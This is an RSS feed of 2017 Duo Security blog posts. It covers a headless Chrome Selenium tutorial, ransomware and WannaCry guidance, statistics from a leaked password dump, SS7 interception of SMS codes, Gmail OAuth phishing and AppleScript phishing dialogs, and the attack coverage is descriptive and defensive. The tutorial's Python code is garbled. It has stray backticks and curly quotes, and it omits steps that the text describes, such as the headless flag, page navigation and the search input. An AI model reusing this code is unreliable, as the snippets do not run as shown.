<![CDATA[The Duo Blog]]> https://duo.com/ Duo's Trusted Access platform verifies the identity of your users with two-factor authentication and security health of their devices before they connect to the apps you want them to access. Tue, 23 May 2017 09:45:00 -0400 en-us info@duosecurity.com (Amy Vazquez) Copyright 2017 3600 <![CDATA[Driving Headless Chrome with Python]]> oanise@duo.com(Olabode Anise) https://duo.com/blog/driving-headless-chrome-with-python https://duo.com/blog/driving-headless-chrome-with-python Duo Labs Tue, 23 May 2017 09:45:00 -0400

Back in April, Google announced that it will be shipping Headless Chrome in Chrome 59. Since the respective flags are already available on Chrome Canary, the Duo Labs team thought it would be fun to test things out and also provide a brief introduction to driving Chrome using Selenium and Python.

Headless Chrome

Browser Automation

Before we dive into any code, let’s talk about what a headless browser is and why it’s useful. In short, headless browsers are web browsers without a graphical user interface (GUI) and are usually controlled programmatically or via a command-line interface.

One of the many use cases for headless browsers is automating usability testing or testing browser interactions. If you’re trying to check how a page may render in a different browser or confirm that page elements are present after a user initiates a certain workflow, using a headless browser can provide a lot of assistance. In addition to this, traditional web-oriented tasks like web scraping can be difficult to do if the content is rendered dynamically (say, via Javascript). Using a headless browser allows easy access to this content because the content is rendered exactly as it would be in a full browser.

Headless Chrome and Python

The Dark Ages

Prior to the release of Headless Chrome, any time that you did any automated driving of Chrome that potentially involved several windows or tabs, you had to worry about the CPU and/or memory usage. Both are associated with having to display the browser with the rendered graphics from the URL that was requested.

When using a headless browser, we don’t have to worry about that. As a result, we can expect lower memory overhead and faster execution for the scripts that we write.

Going Headless


Before we get started, we need to install Chrome Canary and download the latest ChromeDriver (currently 5.29).

Next, let’s make a folder that will contain all of our files:

$ mkdir going_headless

Now we can move the ChromeDriver into the directory that we just made:

$ mv Downloads/chromedriver going_headless/

Since we are using Selenium with Python, it’s a good idea to make a Python virtual environment. I use virtualenv, so if you use another virtual environment manager, the commands may be different.

$ cd going_headless && virtualenv -p python3 env  
$ source env/bin/activate

The next thing we need to do is install Selenium. If you’re not familiar with Selenium, it’s a suite of tools that allows developers to programmatically drive web browsers. It has language bindings for Java, C#, Ruby, Javascript (Node), and Python. To install the Selenium package for Python, we can run the following:

$ pip install selenium


Now that we’ve gotten all of that out of the way, let’s get to the fun part. Our goal is to write a script that searches for my name “Olabode” on duo.com, and checks that a recent article I wrote about Android security is listed in the results. If you’ve followed the instructions above, you can use the headless version of Chrome Canary with Selenium like so:

import os  
from selenium import webdriver  
from selenium.webdriver.common.keys import Keys  
from selenium.webdriver.chrome.options import Options`  

`chrome_options = Options()  
chrome_options.binary_location = '/Applications/Google Chrome   Canary.app/Contents/MacOS/Google Chrome Canary'`    

`driver = webdriver.Chrome(executable_path=os.path.abspath(“chromedriver"),   chrome_options=chrome_options)  

`magnifying_glass = driver.find_element_by_id("js-open-icon")  
if magnifying_glass.is_displayed():  
  menu_button = driver.find_element_by_css_selector(".menu-trigger.local")  

`search_field = driver.find_element_by_id("site-search")  
assert "Looking Back at Android Security in 2016" in driver.page_source   driver.close()`  

Example Explained

Let’s break down what’s going on in the script. We start by importing the requisite modules. The Keys provides keys in the keyboard like RETURN, F1, ALT, etc.

import os  
from selenium import webdriver  
from selenium.webdriver.chrome.options import Options  
from selenium.webdriver.common.keys import Keys

Next, we create a ChromeOptions object which will allow us to set the location of the Chrome binary that we would like to use and also pass the headless argument. If you leave out the headless argument, you will see the browser window pop up and search for my name.

In addition, if you don’t set the binary location to the location of Chrome Canary on your system, the current version of Google Chrome that is installed will be used. I wrote this tutorial on a Mac, but you can find the location of the file on other platforms here. You just need to substitute Chrome for Chrome Canary in the respective file paths.

chrome_options = Options()  
chrome_options.binary_location = '/Applications/Google Chrome   Canary.app/Contents/MacOS/Google Chrome Canary'  
driver = webdriver.Chrome(executable_path=os.path.abspath(“chromedriver"),   chrome_options=chrome_options)

The driver.get function will be used navigate to the specified URL.


The duo.com website is responsive, so we have to handle different conditions. As a result, we check to see if the expected search button is displayed. If it isn’t, we click the menu button to enter our search term.

magnifying_glass = driver.find_element_by_id("js-open-icon")  
if magnifying_glass.is_displayed():  
  menu_button = driver.find_element_by_css_selector(".menu-trigger.local")  

Now we clear the search field, search for my name, and send the RETURN key to the drive.

search_field = driver.find_element_by_id("site-search")  

We check to make sure that the blog post title from one of my most recent posts is in the page’s source.

assert "Looking Back at Android Security in 2016" in driver.page_source

And finally, we close the browser.



Head to Headless

So, it’s cool that we can now control Chrome using Selenium and Python without having to see a browser window, but we are more interested in the performance benefits we talked about earlier. Using the same script above, we profiled the time it took to complete the tasks, peak memory usage, and CPU percentage. We polled CPU and memory usage with psutil and measured the time for task completion using timeit.

Headless (60.0.3102.0) Headed (60.0.3102.0)
Median Time 5.29 seconds 5.51 seconds
Median Memory Use 25.3 MiB 25.47 MiB
Average CPU Percentage 1.92% 2.02%

For our small script, there were very small differences in the amount of time taken to complete the task (4.3%), memory usage (.5%), and CPU percentage (5.2%). While the gains in our example were very minimal, these gains would prove to be beneficial in a test suite with dozens of tests.

Manual vs. Adhoc

In the script above, we start the ChromeDriver server process when we create the WebDriver object and it is terminated when we call quit(). For a one-off script, that isn’t a problem, but this can waste a nontrivial amount of time for a large test suite that creates a ChromeDriver instance for each test. Luckily, we can manually start and stop the server ourselves, and it only requires a few changes to the script above.

Example Snippet

import os  
from selenium import webdriver  
from selenium.webdriver.common.keys import Keys  
from selenium.webdriver.chrome.options import Options

service = webdriver.chrome.service.Service(os.path.abspath(“chromedriver"))  

chrome_options = Options()  

# path to the binary of Chrome Canary that we installed earlier  
chrome_options.binary_location = '/Applications/Google Chrome   Canary.app/Contents/MacOS/Google Chrome Canary'

driver = webdriver.Remote(service.service_url,   desired_capabilities=chrome_options.to_capabilities())

Snippet Explained

While there are only three lines of code that have changed, let’s talk about what’s going on in them. In order to manually control the ChromeDriver server, we have to use the ChromeDriverService. We do so by creating a service object with a path to the ChromeDriver and then we can start the service.

service = webdriver.chrome.service.Service(os.path.abspath(“chromedriver"))

The final thing we have to do is create a WebDriver that can connect to a remote server. In order to use Chrome Canary and the headless portion, we have to pass the the dictionary of all the options since the remote WebDriver object doesn’t accept an Option object.

driver = webdriver.Remote(service.service_url,   desired_capabilities=chrome_options.to_capabilities())

The Payoff

By adding the manual starting of the service, we saw the expected speed increases. The median time for the headless and headed browser to complete the tasks in the script decreased by 11% (4.72 seconds) and respectively 4% (5.29 seconds).

Headed Browser Headless Browser
Median Time(% decrease) 4% 11%
Median Time (Seconds) 5.29 seconds 4.72 seconds

The Wrap-Up

The release of headless Chrome has long been awaited. And with the announcement that the creator of PhantomJS is stepping down as a maintainer, we strongly believe that headless Chrome is the future of headless browsers.

While we covered Selenium in this walkthrough, it is worth mentioning that the Chrome DevTools API can be a useful resource if you’re doing any type of profiling or need to create PDFs of pages that you visit. We hope this helps you get started using the headless version of Chrome whether you’re doing any type of QA testing or are automating all your daily web-related tasks.


Github Repo

Chrome Links

Selenium Links

<![CDATA[HHS Urges HIPAA Guidance for Dealing With Ransomware]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/hhs-urges-hipaa-guidance-for-dealing-with-ransomware https://duo.com/blog/hhs-urges-hipaa-guidance-for-dealing-with-ransomware Industry News Thu, 18 May 2017 09:45:00 -0400

In the wake of the widespread ransomware attack launched last Friday that has quickly spread worldwide, the Dept. of Health and Human Services (HHS) sent an email reminder to healthcare organizations, urging them to adhere to the Office for Civil Rights’ (OCR) ransomware guide published last year.

The guide covers how to prevent and recover from a ransomware attack, as well as how the Health Insurance Portability and Accountability Act (HIPAA) plays a role when it comes to breach notification.

While the ransomware attack hit hospitals in the U.K. hard, Forbes has reported on infected medical devices in a U.S. hospital affecting Bayer Medrad radiology equipment used to improve imaging. Bayer will be sending out a patch for its Windows-based devices soon.

Preventing Ransomware With HIPAA

How does the HIPAA Security Rule requirements address the security measures you can take to prevent malware/ransomware?

While not overly specific or technical (like PCI DSS), they do provide a very broad outline of basic measures to take:

  • Security Management Process - Conduct a risk analysis to identify threats and vulnerabilities to electronic protected health information (ePHI).
  • Security Measures & Procedures - Implement security measures and procedures to mitigate risks, guard against and detect malware.
  • Train Users - Educate employees so they can assist in detecting malware, and know how to report detections.
  • Strong Access Controls - Limit access to ePHI to only the users, applications or programs that require access.

For example, the guide acknowledges that there isn’t a HIPAA requirement that explicitly calls for updating network device firmware, but healthcare organizations should identify and address the risks to ePHI when using network devices running on out-of-date firmware.

To secure remote access to systems with ePHI, using two-factor authentication can reduce the risk of phishing or password-related breaches. It’s highly recommended in HHS’s HIPAA Security Guidance, and required for e-prescriptions by the Drug Enforcement Administration (DEA) - known as Electronic Prescriptions for Controlled Substances (EPCS) compliance.

Recovering from Ransomware With HIPAA

There are specific policies and procedures that can help healthcare organizations when it comes to responding and recovering from ransomware:

  • Implement a Data Backup Plan - Maintain frequent backups and conduct periodic test restorations to verify the integrity of the data backups. Keep backups offline and unavailable to other networks to avoid infection.
  • Establish a Contingency Plan - In addition to a data backup plan, healthcare organizations need to conduct disaster recovery and emergency operations planning. They also need to analyze the criticality of applications and data, while periodically testing contingency plans to make sure their teams are ready to execute. This can help businesses (like hospitals) continue operating while recovering from an attack.
  • Security Incident Procedures - Create procedures to detect and conduct an analysis of ransomware; contain the impact and propagation of the ransomware; and remediate vulnerabilities associated with the ransomware attack.
  • Post-Incident Procedures - Conduct a deeper analysis of the incident to determine if providing a breach notification is necessary, and incorporate lessons learned into existing security processes to improve incident response effectiveness for future incidents.

Remediating vulnerabilities that may have allowed the ransomware to infect your systems is key to closing security gaps quickly and protecting against another malware infection. One example is applying the Microsoft emergency patches released for older versions of their Windows operating system (OS) to prevent the spread of the WannaCry ransomware.

In addition to keeping your antivirus up to date, you should keep device OS, browsers, plugins and other software updated to protect against publicly-reported vulnerabilities that can be used to compromise access to your users’ devices and healthcare systems. Use an endpoint security solution that can detect risky devices and block them until users update.

Finally, when it comes to breach notification, the HHS states:

The OCR presumes a breach in the case of ransomware attack. The entity must determine whether such a breach is a reportable breach no later than 60 days after the entity knew or should have known of the breach.

Read more about the recent WannaCry ransomware attack, including specific tips to help you prevent malware infection while keeping risky devices from accessing your applications, and learn more about Duo for Healthcare.

<![CDATA[The Competitive Advantage of Integrating Security & Privacy into Your Business Strategy]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/the-competitive-advantage-of-integrating-security-and-privacy-into-your-business-strategy https://duo.com/blog/the-competitive-advantage-of-integrating-security-and-privacy-into-your-business-strategy Industry News Wed, 17 May 2017 09:45:00 -0400

Organizations are exploring how to create value and gain a competitive advantage by integrating information security and privacy with their business strategy, according to a 2017 cybersecurity report from PricewaterhouseCoopers (PwC).

Competitive Advantage: Security, Privacy & Usability

The shift in a business models from a one-time sales event to a longer product lifecycle, providing add-on digital services over time drives up customers’ expectations around usability, privacy and security.

That makes these priorities for digital services a must-have for any business attempting to stay competitive in a digital industry.

In a 2016 survey of emerging consumer risks over the next five years, the Traveler’s Risk Index found that 32 percent of Americans are concerned about cyber risk and the Internet of Things (IoT), second to global political and social unrest. Top overall concerns include financial, personal safety, privacy loss and identity theft, mainly related to the threat of bank or financial accounts getting hacked.

Similarly, the same survey found that 54 percent of businesses are concerned with cyber, computer/technology risks and data breaches, among other top concerns about medical cost inflation and increasing employee benefit costs. Another 25 percent feel unprepared to deal with cyber risks.

Business Security Spending Priorities

According to PwC, business spending priorities for the next year include improved collaboration among business, digital and IT (51%), and spending on new security needs related to evolving business models (46%). Another 43% are spending on biometrics and advanced authentication.

Those new security needs include technology like encryption, next-generation firewalls, network segmentation and identity and access management. As Tom Puthiyamadam, Global Digital Services Leader of PwC stated:

Leading companies are integrating cybersecurity, privacy and digital ethics from the outset. And that enables them to better engage with existing customers and attract new ones. Many also see efficiencies in operations, business processes and IT investments.

Multi-Factor Authentication as a Differentiator

The top managed security service used is authentication, at 64 percent, followed by data loss prevention (61 percent) and identity and access management (61 percent).

Respondents reported that advanced authentication (PwC uses this term in reference to multi-factor authentication) technologies have made online transactions more secure, boosted consumer confidence in company security and privacy capabilities, and enhanced the customer experience while protecting brand reputation.

While in the past, many companies implemented multi-factor authentication after a breach, nowadays, most are implementing the technology as a preventative measure to secure access to on-premises, cloud and web applications and services, and as a stronger authentication option for their customers to protect their individual banking, social media, iCloud and many other types of accounts.

Global Data Regulations

In addition to being a competitive advantage, there are data regulatory requirements that vary by each country that are also driving changes in enterprise security.

These include the European Union (EU)’s General Data Protection Regulation (GDPR) going into effect April 2018 that mandates data privacy for EU citizens - noncompliance can result in fines of up to 4 percent of the company’s global annual revenue.

Additionally, many U.S. businesses will need to comply with the Privacy Shield, the successor to the Safe Harbor framework that protects EU citizens’ personal data in transit.

There are regulations across Asia as well - in China, recent laws require technology and financial companies to store data in China, submit to security checks and help the government with decryption if requested. South Korea’s Personal Information Act (PIPA), updated last year, has penalties that can amount to nearly $90,000 USD and/or 10 years in prison.

Hong Kong’s Personal Data Privacy Ordinance also sets rules for collecting and handling personal data across borders and to third parties, enforced by fines of over $100,000 USD and five years in prison. A new framework called the Cyber Fortification Initiative requires banks to meet certain security requirements, with major Hong Kong banks to complete evaluations of their cyber risk resilience by mid-2017.

Find out more about how Duo’s Trusted Access platform provides help for different use cases and view our case studies for companies across every industry, compliance needs and size.

<![CDATA[Widespread Ransomware Attack Plagues Europe, Asia & U.K. Hospitals]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/widespread-ransomware-attack-plagues-europe-asia-and-uk-hospitals https://duo.com/blog/widespread-ransomware-attack-plagues-europe-asia-and-uk-hospitals Industry News Fri, 12 May 2017 16:00:00 -0400

Update 5/15:
The ransomware has spread to 200,000 computers in 150 countries, affecting U.S. FedEx, telecoms and gas companies in Spain, 61 NHS organizations, the Russian Ministry of Internal Affairs and many others, according to the Economist and BBC. A few different variations of the malware have been detected.

What you can do:
Microsoft has taken the “highly unusual step” of providing a security update for Windows XP, Windows 8 and Windows Server 2003, available here.

Windows 10 users are not affected, only older versions of the operating system. Other suggestions include disabling the SMB protocol in Windows computers and updating antivirus solutions.

Take other precautions such as using the Chrome browser, and disable Adobe Flash Player. Forward suspicious/possible phishing emails to your security team and don’t click on any links. Back up your data on a physical hard drive disconnected from the Internet, in addition to a cloud service (but beware, it could get infected), as recommended by PCWorld.

Start tracking devices running out-of-date operating systems, browsers, plugins and more with Duo’s Device Insight and block them with Endpoint Remediation to prevent the access of potentially risky software into your systems.

A widespread, worm-like ransomware attack has shut down computers across Europe and Asia, hitting the Spanish telecom provider, Telefonica and operations in major U.K.-based health systems especially hard. Many other mission-critical organizations have also been disrupted, including banks and power companies.

The attack has taken down at least 16 National Health Service (NHS) hospital systems across England, affecting parts of Scotland, as reported by ZDNet. Hospitals in Manchester, Lister Hospital in Hertfordshire and Bart’s Health NHS Trust in London are all affected.

The hospitals have diverted patients to neighboring hospitals and are urging others not to visit their emergency departments. Routine appointments have been cancelled, with entire systems shut down and some hospitals reporting problems with their telephone networks.

Ransomware Leverages Latest Windows Vulnerability

According to NHS Digital, the organization that runs IT systems for the health service, the malware variant used is Wanna Decryptor.

BleepingComputer reports that the ransomware’s name is actually WCry, but is referenced online by various similar names. There have been several reports that the ransomware is using an NSA exploit leaked by Shadow Brokers last month, a vulnerability in the SMBv1 protocol affecting Windows machines.

It uses a self-replicating payload that allows the ransomware to spread across machines quickly without requiring any user action, according to Ars Technica. Below is a photo of the ransomware encryption message that users are seeing on their computers:

There were reports early Friday on social media of the ransomware spreading quickly through Russian, Ukraine and Taiwan:

Although Microsoft patched the critical vulnerability in March, not all Windows users or administrators have necessarily applied the security update. Unpatched computers are easy targets of exploitation and malware installation.

Back in January, Barts Health NHS hospitals were hit by a ransomware infection which took its systems offline. According to Barts Health NHS Trust, their antivirus software failed to detect the virus. Another attack last November against the Northern Lincolnshire and Goole NHS Foundation Trust infected their systems with a type of ransomware known as Globe2.

Windows XP Run Rampant in U.K. Health Systems

Running extremely out-of-date operating systems (OSs) like Windows XP can be a contributing factor. And as Duo’s data has shown in the past, the healthcare industry has twice as many Windows machines running XP than our average customer.

An analysis of Freedom of Information Act (FoI) requests by Citrix also supports our findings. A survey of 63 NHS trusts (42 responses) in the U.K. revealed that:

90 percent of hospital organizations were running Windows XP on a small percentage of their overall devices.

But even one device running an unsupported (unpatched and unprotected against new vulnerabilities) OS could be the weak link at a hospital system, allowing for malware infection. Windows XP is particularly bad due the fact it was released in 2001 and is not capable of receiving security updates since April 2014 - meaning a hospital system running the OS could be easily exploited by ransomware that leverages a Windows vulnerability only patched in March.

Protecting Against Ransomware

Updating and patching your software regularly against the latest vulnerabilities is key to protecting your systems against malware infection.

Make sure you have applied Microsoft’s March Update and the MS17-010 update to protect against these types of vulnerabilities that are helping to spread the ransomware to Windows machines worldwide. Check often for emergency patches that are released out of the regular Patch Tuesday cycle for the most critical vulnerabilities.

Learn more by downloading The 2016 Duo Trusted Access Report (our 2017 edition is coming soon!) and The Essential Guide to Securing Remote Access.

<![CDATA[A Security Analysis of Over 500 Million Usernames and Passwords]]> klady@duosecurity.com(Kyle Lady) https://duo.com/blog/a-security-analysis-of-over-500-million-usernames-and-passwords https://duo.com/blog/a-security-analysis-of-over-500-million-usernames-and-passwords Duo Labs Thu, 11 May 2017 09:45:00 -0400

We at Duo Labs recently got our hands on the so-called Anti Public Combo List, a dump of 562,077,487 usernames and passwords aggregated from a variety of large-scale data breaches and password dumps. While this means that we can’t say anything about user security behavior in particular contexts, it still provides an uncommonly large view into broad user security choices.

Who Are These Users?

The first question that presents itself when a credential dump lands in your lap is often: who is affected by this breach? We found 8% of the usernames (which are primarily email addresses) appear more than once in the dataset, supporting the idea that this particular dump is, in fact, a collection of individual dumps from separate sources.

We also found that 42% of usernames end in yahoo.com, while 7% end in aol.com, leading us to the conclusion that this is a consumer-heavy dataset, rather than, say, corporate email accounts. The domains with more than 1% representation in the user list is below:

Email Domain Percent of Database
yahoo.com 41.71%
aol.com 7.31%
web.de 2.39%
live.com 2.02%
gmx.de 1.91%
msn.com 1.82%
yahoo.de 1.49%
yahoo.fr 1.42%
yahoo.co.uk 1.32%
aim.com 1.15%
comcast.net 1.12%
lycos.de 1.12%
epost.de 1.11%

Overall, 51% of the user accounts are some sort of yahoo.* or ymail.* accounts. Certainly some corporate email accounts are included. By filtering for domains of the Fortune 1000 companies and manually removing domains that are used for consumer email (like yahoo.com and facebook.com), we found that only about 1 million (1.7%) of the accounts in the dump were from domains of large companies, which reinforces our assessment that this is almost entirely consumer accounts, comprising 98.3% of the dataset

What Do Their Passwords Look Like?

One measure of password strength is the length of a password. This is a very flawed metric for asserting strength, but you can assert weakness with it: a four-character password is easy to brute force, no matter how many special characters you use.

Distribution of Password Length

The set of passwords in this dump follow a nice exponential long-tail distribution in terms of length, peaking at 9 characters at 27%, falling under 1% after 14 characters. The large spike right after 100 occurs, not coincidentally, at 128 bytes, which is the length of a SHA-512 hash in hex.

Upon further inspection, that’s exactly what all of those are: just a bunch of hashes, like fab689475682c7a88be219de0a76f0d6096e487fa0bcdd752048d3aaa76dd9ef47344 b89817434a284d8cb5b0111a2ada7aafcb635570c32149e43b58a990c9d.

Since this appears to be a collection of individual password dumps, it’s likely that the breach in question resulted in the theft of hashes instead of cleartext passwords. When this happens, attackers will try to crack as many passwords as possible, leaving the hashes in place for those they couldn’t quickly crack.

The pitfall of just looking at password length is obvious when considering the password ’refrigerator.’ “After all, it’s a 12-character password! That sounds secure!” Except that all-lower-case letters dramatically reduces the search space, as compared to lowercase, uppercase, numbers and symbols. In this case, it’s an especially bad password, since it’s just a single common dictionary word and would likely be included on a list of common words that an attacker might try before just guessing randomly. One common password restriction is that it must include a number. Either due to users’ adopting stronger security habits or merely due to password requirements, 70% of passwords had at least 1 number. Indeed, the mean number of numbers per password is 2.3.

Uppercase and symbols were not nearly as prevalent, with only 6% and 4% of passwords containing at least one such character, respectively. This lends credence to the argument that it’s merely password requirements that prompt more secure password choices. A surprisingly low result was for the space character, which is allowed by many systems, but was only present in 0.03% of passwords examined.

This suggests that an attacker might be less likely to include space in their set of search characters, and users would be wise to keep in mind that spaces can often be valid password characters when choosing. One easy way to incorporate spaces is by using passphrases: entire phrases that you use as a password, assuming you don’t get stopped by draconian maximum lengths.

The Top 10 Passwords

The top ten passwords contain some fan favorites and aligns closely with other password reports, such as password manager Keeper’s top 10:

Anti Public Keeper
123456 123456
123456789 123456789
abc123 qwerty
password 12345678
password1 111111
12345678 1234567890
111111 1234567
1234567 password
12345 123123
1234567890 987654321

If one had to wager a guess, it looks like 6 characters is the most common minimum password length in modern consumer web applications. That really isn’t enough to reasonably protect your password from someone just trying all the possible passwords (i.e., “brute forcing”). NIST recently wrapped up a comment period on new security standards, which include, “Memorized secrets [i.e., passwords or PINs] [shall] be at least 8 characters in length if chosen by the [user].” These days, something more like 12 characters should be what you aim for as a minimum, since attackers can guess faster as computers get faster.

Ok, So Have I Been Pwned?

Funny you should ask that, as that’s the name of an excellent website that collects breached account data so you can see when and how your username/passwords have been leaked (since, by now, almost everybody’s username/password has been leaked at some point). If you are interested in the source for this particular password dump, Troy Hunt, the creator of HIBP, has posted an analysis of the password dump on his blog.

We recommend that you sign up for the free monitoring option, where you get an email if/when your email address shows up in a newly discovered credential dump. If you are a domain administrator, you can also search for all pwned accounts on your domain.

<![CDATA[SMS-Based Two Factor Exploited in Bank Account Transfer Scheme]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/sms-based-two-factor-exploited-in-bank-account-transfer-scheme https://duo.com/blog/sms-based-two-factor-exploited-in-bank-account-transfer-scheme Industry News Tue, 09 May 2017 09:45:00 -0400

Yet another example of how SMS-based two-factor authentication is not secure can be seen in the recent Signalling System No. 7 (SS7) attacks in January. Malicious hackers redirected money from German customers’ banking accounts to their own accounts in a series of attacks, according to Ars Technica and Süddeutsche Zeitung.

First, they compromised bank accounts with Trojans that infected users’ devices and stole their account passwords. This allowed attackers to see customers’ account balances. Second, they compromised the one-time password sent as a text message to the users’ phone which was required to make money transfers.

Exploiting SS7

To do that, they exploited a flaw in SS7, the telephony signaling language that allows people to send text messages across the world, take uninterrupted phone calls on trains, and roam from one network to another internationally. The protocol is used by more than 800 telecommunications companies globally - thereby making it a key target for criminals to remotely intercept one-time passwords and enable money transfers.

The exploited vulnerability has been publicly known for many years, targeting telecommunications networks. The attack was carried out from a foreign mobile network operator in mid-January, and that network has since been blocked, and affected customers notified. Last week, Rep. Ted Lieu of California called for the Federal Communications Commission (FCC) and telecom industry to fix this flaw, which was said to be discovered in 2006 and fully disclosed in March, as reported by SC Magazine.

According to an article by Security Intelligence, this ‘flaw’ is really an intentional loophole/design feature of SS7, and that telephone networks were not designed to be secure. SS7 gives users a seamless experience as they travel. One alternative to keeping phone calls private is by using end-to-end encryption apps. Another recommendation is to use more secure methods of two-factor authentication to better protect access to your accounts.

NIST Nixes SMS-Based 2FA

Last July, the U.S. National Institute for Standards and Technology (NIST) announced they were pulling SMS-based two-factor authentication (2FA) from their Digital Identity Guidelines, Special Publication 800-63-3, a move that Duo supported.

NIST states that SMS 2FA isn’t secure due to the fact that the phone may not always be in possession of the phone number, and because SMS messages can be intercepted and not delivered to the phone. The SS7 attack is one example of why text-based 2FA isn’t the most secure method.

The latest Verizon Data Breach Investigations Report (DBIR) noted this very attack scenario as a ‘common event chain’ listed by NIST as a reason to move away from SMS 2FA. The Verizon DBIR stated:

We are not suggesting using two-factor authentication via SMS is akin to building a house of sticks (as opposed to a straw house) for the mitigation of wolf attacks, but it is a window into the thinking of the adversary. When faced with defeating multi-factor authentication, they will pragmatically try to devise a way to capture both factors for reuse.

Better Ways to 2FA

What are some better, more secure 2FA methods? Try U2F (Universal 2nd Factor), an open authentication standard developed by the FIDO (Fast Identity Online) Alliance for secure and easy-to-use 2FA.

How does it work? Simply enroll with Duo, then tap a physical USB device to verify your identity. This device is known as a U2F authenticator that protects private keys with a tamper-proof component known as a secure element.

Two-Factor Authentication Evaluation Guide Or use Duo Push, a push notification delivered to your phone via a 2FA mobile app, Duo Mobile. Approve the notification to verify your identity and get granted access after completing your primary method of authentication (typically a username and password).

Learn more about evaluating different two-factor authentication solutions by downloading the Two-Factor Authentication Evaluation Guide.

This guide walks through some of the key areas of differentiation between two-factor authentication solutions and provides some concrete criteria for evaluating technologies and vendors.

<![CDATA[Gmail OAuth Phishing Goes Viral]]> jwright@duo.com(Jordan Wright) https://duo.com/blog/gmail-oauth-phishing-goes-viral https://duo.com/blog/gmail-oauth-phishing-goes-viral Duo Labs Thu, 04 May 2017 09:45:00 -0400

On Wednesday, a Gmail phishing attack leveraging OAuth spread quickly to multiple users. There are a number of features that you need to be aware of that made this attack incredibly successful, as well as ways to protect yourself or your employees that are detailed below.

Google Doc Phishing

What Made This Attack Different?

This attack started with a phishing email that originated from someone the recipient likely knew. The email purported to be a request to share a document via Google Docs.

Email Phish

Normally, phishing attacks will then present a fake login page that attempts to trick users into submitting their username and password. These credentials are then sent to the attacker and used to gain access to the email account.

This attack was different in that once the user clicks the “Open in Docs” button, they are taken to a page which requests OAuth permissions for their account, allowing the attacker to hijack the Gmail account to send email on the user’s behalf without needing their credentials. Before going into details, it’s worth a quick background on why OAuth can make for effective phishing campaigns.

OAuth Can Be Convincing

OAuth allows third-party applications to access a service on your behalf without needing your credentials. Instead, the application will request certain permissions depending on what parts of the service it needs to access. This is a legitimate way to safely give applications limited access to a service as your account without giving up your credentials.

This attack used OAuth to gain access to manage contacts and email for the user’s Google account. This allowed it to harvest new recipients, send the emails as the victim to those recipients, and then delete the emails from the user’s Sent Mail.

Google Doc Phishing

There are multiple elements to this campaign that made it highly effective:

  • The email was sent to a user’s contacts, which means recipients saw the email coming from someone they likely know
  • The email looks like a legitimate Google Docs request to share a document
  • The malicious third-party application was named “Google Docs,” matching the email pretext and appears legitimate to many users (it’s unclear if Google will prevent applications from being named like this in the future)
  • Using OAuth meant that the user was never prompted to enter their credentials, only to allow access to an application. This means the user is already logged into their Google account, mitigating strong passwords or two-factor authentication (2FA).

Worm-Like Behavior

This attack went viral in minutes due to its convincing nature and the way it spread to other recipients. For each new victim, the attack spread to all of their contacts which could lead to exponential growth similar to that of other computer worms, such as the “ILOVEYOU” worm.

Since this is a malicious third-party application gaining access to an account via OAuth, the application could use Google’s APIs to automate a majority of the attack, spreading the attack even more easily and quickly.

This Isn’t Just Email

It’s important to note that OAuth isn’t just supported by Gmail. Many service providers such as social networks support OAuth as a means to allow applications to access specific resources on behalf of users. It’s no stretch to say that this same type of attack abusing OAuth permissions could be effective on other services as well.

How to Protect Yourself

Click Carefully

OAuth phishing isn’t going away. The success of this campaign suggests that we are likely to see more of this type of phishing moving forward. These attacks are easy to automate, are cheap to set up, and, as we saw on Wednesday, are very effective.

The first step for protecting yourself against this type of phishing scam is to be careful which links you click on in emails. These emails all had the recipient listed as a “mailinator” address (a disposable email service), with the actual recipient BCC’d. This could be a hint that the email may not be legitimate.

The next step to protecting yourself from OAuth phishing attacks is to be careful which applications you let access your account. When you encounter a new application request, review the permissions to determine if you’re ok with letting the app have access to those parts of your account. A good tip is to be as careful with OAuth permissions as you are with your actual credentials.

You can also review information about the developer of the application to help determine if it might be malicious. By clicking the application name (in this case, “Google Docs”), you can see the following:

Developer Info

In this case, the email address for the developer appears to be a non-official personal Gmail account.

Also, as part of the OAuth process, you are redirected back to the third-party application when you allow access. In this case, you are redirected back to a URL that tries to look legitimate, but is not an actual URL operated by Google.

Review Existing Applications

This is a good time to review what applications have access to your Google account. Over time, you may have given permission to applications that you no longer use. However, those applications can still have access to your Google account unless you explicitly revoke their access.

You can review which applications have access to your Google account (and revoke that access) by going to https://myaccount.google.com/permissions.

In this case, if you allowed the fake “Google Docs” application to access your Google account, you can revoke it by going to the permissions page, finding the “Google Docs” entry and clicking “Remove:”

Remove Apps


This attack was a great example of how powerful OAuth phishing can be. However, while this event spread rapidly, the great work from service providers like Google and Cloudflare to shut down the attacker’s infrastructure helped rein in the attack just as quickly as it began.

As OAuth phishing becomes more common, it’s important to be careful when letting new applications access your account, as well as regularly reviewing which applications still have access.

To assess your organization’s risk of getting phished, launch an internal phishing campaign using our free phishing tool, Duo Insight.

<![CDATA[The macOS Phishing Easy Button: AppleScript Dangers]]> pbruienne@duo.com(Pepijn Bruienne) https://duo.com/blog/the-macos-phishing-easy-button-applescript-dangers https://duo.com/blog/the-macos-phishing-easy-button-applescript-dangers Duo Labs Thu, 04 May 2017 09:45:00 -0400

The Issue

The recently discovered OSX.Bella malware, which gets much of its payload from an Open Source Software (OSS) post-exploitation toolkit by the same name, reminds us again how easy it is for an attacker to create legitimate-looking phishing dialogs using built-in macOS scripting functionality.

By writing a few lines of AppleScript, an attacker can use system tools like System Preferences, App Store or iTunes to present a legitimate-looking dialog prompting the victim to re-enter their Apple ID or local user account credentials in order to fix a problem an application on their system is having.

Because there was no actual issue, the application will (still) be working as expected, giving the victim the impression that the prompt was legitimate and they helped to rectify the issue. Afterwards, the attacker can use the captured credentials to elevate privileges and take actions of their choosing such as deploying malware or taking control of the victim’s Apple ID account.

What is AppleScript?

Before we continue, let’s look at what makes all of this possible. AppleScript is Apple’s native scripting language that has shipped with Apple’s Macintosh operating system since System 7 in 1991, and every consecutive version through today. As such, it is deeply embedded in the OS and has far-reaching capabilities due to it being part of many system tools, especially those with a user-facing UI.

AppleScript has been popular among home users and professionals alike for its ability to close the gap between what the OS is capable of out of the box and third-party applications, as well as for batch-processing. To make creating AppleScript applications or system services even easier, Apple has also shipped the drag-and-drop driven Automator with macOS since version 10.4.

Why Use AppleScript?

One of the reasons AppleScript has remained popular with Mac users is because it is very easy to create a GUI-driven scripted workflow or self-contained application. Getting user input and displaying results is easy by using the display dialog verb which is available for any application that is AppleScript-compatible.

